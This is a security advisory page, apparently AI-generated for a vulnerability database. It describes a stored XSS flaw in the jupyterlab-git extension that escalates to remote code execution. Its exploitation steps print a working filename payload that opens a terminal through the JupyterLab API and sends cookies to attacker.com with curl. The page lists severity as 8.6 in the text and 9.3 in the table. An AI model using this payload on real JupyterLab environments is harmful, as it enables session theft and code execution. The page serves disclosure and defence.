CVE-2026-54527
JavaScript Analyse et atténuation des vulnérabilités

Aperçu

CVE-2026-54527 is a stored cross-site scripting (XSS) vulnerability in the jupyterlab-git JupyterLab extension that can be escalated to remote code execution (RCE). Discovered by Amazon Web Services (AWS) Security during internal testing and disclosed on June 18, 2026, the flaw affects @jupyterlab/git (npm), jupyterlab-git (pip), and jupyterlab-git-core (pip) versions >= 0.30.0b3 and < 0.54.0a1. The vulnerability was patched in version 0.54.0 across all affected packages. It carries a CVSS v4.0 base score of 8.6 (High) (GitHub Advisory, jupyterlab-git Advisory).

Détails techniques

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). Specifically, the createHeader() method in PlainTextDiff.ts (line 214) constructs diff headers by concatenating Git filenames directly into an innerHTML assignment without any HTML sanitization or escaping (GitHub Advisory). An attacker with commit access to a shared repository can embed a JavaScript payload inside a crafted filename (e.g., a .py file whose name contains <script> tags or event handlers), rename the file in a subsequent commit, and push to the repository. Exploitation requires the victim to open the Git History tab in JupyterLab, click the rename commit, and click the renamed file to view the diff — at which point the unsanitized filename is rendered via innerHTML and the payload executes (jupyterlab-git Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's JupyterLab browser session, which can be escalated to full RCE. The injected script reads the _xsrf cookie, issues a POST /api/terminals request to open a JupyterLab terminal, connects via WebSocket, and executes arbitrary shell commands — granting access to user code, data, environment variables, and credentials (GitHub Advisory). This can result in complete confidentiality, integrity, and availability compromise of the victim's JupyterLab environment, including exfiltration of cloud credentials or secrets stored in the environment (jupyterlab-git Advisory).

Étapes d’exploitation

  1. Prepare the malicious filename: Create a file with a crafted filename embedding a JavaScript payload, e.g., <img src=x onerror="fetch('/api/terminals',{method:'POST'}).then(r=>r.json()).then(d=>{const ws=new WebSocket('ws://'+location.host+'/terminals/websocket/'+d.name);ws.onopen=()=>ws.send(JSON.stringify(['stdin','curl http://attacker.com/exfil?c='+document.cookie+'\n']))})">exploit.py.
  2. Commit and rename: Commit the file to a shared Git repository, then rename it in a subsequent commit and push both commits to the shared repository.
  3. Wait for victim interaction: The victim clones or pulls the repository and opens JupyterLab with the jupyterlab-git extension installed.
  4. Trigger the payload: The victim navigates to the Git History tab, clicks the rename commit, and clicks the renamed file to view the diff. The createHeader() method in PlainTextDiff.ts assigns the unsanitized filename to innerHTML, executing the embedded JavaScript.
  5. Escalate to RCE: The injected script reads the _xsrf cookie, sends a POST request to /api/terminals to open a terminal, connects via WebSocket, and sends arbitrary shell commands — achieving full RCE in the victim's environment (GitHub Advisory, jupyterlab-git Advisory).

Indicateurs de compromis

  • Network: Unexpected POST /api/terminals requests originating from a JupyterLab browser session; WebSocket connections to /terminals/websocket/<id> shortly after a user views a Git diff; outbound HTTP requests from the JupyterLab server to unknown external hosts (potential exfiltration).
  • Logs: JupyterLab server logs showing terminal creation (POST /api/terminals) immediately following a Git History diff view; WebSocket upgrade requests to /terminals/websocket/ from browser sessions; unusual shell commands executed via the terminal API (e.g., curl, wget, env, credential-harvesting commands).
  • File System: Unexpected files written to the JupyterLab working directory by a terminal session; presence of Git repository files with filenames containing HTML/JavaScript special characters (<, >, onerror=, <script>).
  • Process: Shell processes (e.g., bash, sh) spawned as children of the JupyterLab server process with unusual arguments or network activity (GitHub Advisory).

Atténuation et solutions de contournement

Users should upgrade jupyterlab-git (pip), jupyterlab-git-core (pip), and @jupyterlab/git (npm) to version 0.54.0 or later, which addresses the vulnerability by sanitizing filenames before DOM insertion (GitHub Advisory). As a temporary workaround, the advisory recommends replacing innerHTML with textContent for filename rendering in the createHeader() method of PlainTextDiff.ts, or applying proper HTML escaping (<, >, &, ", ') before inserting user-controlled filenames into the DOM (jupyterlab-git Advisory). Organizations should also restrict commit access to shared repositories to trusted users and audit existing repositories for filenames containing HTML/JavaScript special characters.

Réactions de la communauté

The vulnerability was discovered and reported by Amazon Web Services (AWS) Security during internal security testing, with credit attributed to krassowski as remediation reviewer and jtpio as remediation developer (jupyterlab-git Advisory). The advisory was published on June 18, 2026, and the fix was released promptly. No significant broader media coverage or notable public researcher commentary beyond the official advisory has been identified at this time.

Ressources additionnelles


SourceCe rapport a été généré à l’aide de l’IA

Apparenté JavaScript Vulnérabilités:

Identifiant CVE

Sévérité

Score

Technologies

Nom du composant

Exploit CISA KEV

A corrigé

Date de publication

CVE-2026-54527CRITICAL9.3
  • JavaScript logoJavaScript
  • jupyterlab-git
NonOuiJul 08, 2026
CVE-2026-57480HIGH8.7
  • JavaScript logoJavaScript
  • parse-server
NonOuiJul 08, 2026
CVE-2026-55849HIGH8.5
  • JavaScript logoJavaScript
  • @cyclonedx/cyclonedx-npm
NonOuiJul 08, 2026
CVE-2026-57481LOW2.3
  • JavaScript logoJavaScript
  • parse-server
NonOuiJul 08, 2026
CVE-2026-55778LOW2.1
  • JavaScript logoJavaScript
  • parse-server
NonOuiJul 08, 2026

Évaluation gratuite des vulnérabilités

Évaluez votre posture de sécurité dans le cloud

Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.

Demander une évaluation

Obtenez une démo personnalisée

Prêt(e) à voir Wiz en action ?

"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
David EstlickRSSI
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
Adam FletcherChef du service de sécurité
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."
Greg PoniatowskiResponsable de la gestion des menaces et des vulnérabilités